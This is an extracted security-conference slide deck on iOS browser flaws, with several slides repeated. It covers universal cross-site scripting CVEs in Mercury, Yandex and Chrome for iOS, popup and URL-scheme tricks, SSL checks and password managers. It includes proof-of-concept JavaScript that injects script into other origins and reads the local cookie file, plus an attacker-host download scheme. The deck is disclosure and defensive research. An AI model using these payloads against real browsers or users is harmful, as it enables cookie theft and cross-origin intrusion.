bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
